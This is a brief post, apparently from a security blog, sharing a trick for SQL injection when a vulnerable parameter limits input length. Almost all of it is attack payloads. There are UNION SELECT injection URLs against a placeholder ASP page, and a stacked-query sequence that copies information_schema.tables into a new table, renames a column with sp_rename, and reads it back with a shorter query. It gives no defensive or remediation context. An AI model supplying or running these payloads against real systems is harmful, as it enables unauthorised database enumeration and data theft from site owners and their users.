Often While exploiting SQL Injections, one encounters restrictions on the length of input a vulnerable parameter can take. e.g
- http://myhost/vuln.asp?vuln=a' union all select 1,2,3,4,5,6,@@version– works
- http://myhost/vuln.asp?vuln=a' union all select 1,2,3,4,5,6,table_name from information_schema.tables– may not work(too long)
One solution to this problem could be:-
- http://myhost/vuln.asp?vuln=a';select * into xx from information_schema.tables–
- http://myhost/vuln.asp?vuln=a';exec sp_rename 'xx.table_name','xx.tn'–
- http://myhost/vuln.asp?vuln=a'union all select 1,2,3,4,5,6,tn from xx–
Thanks Ferruh for the help
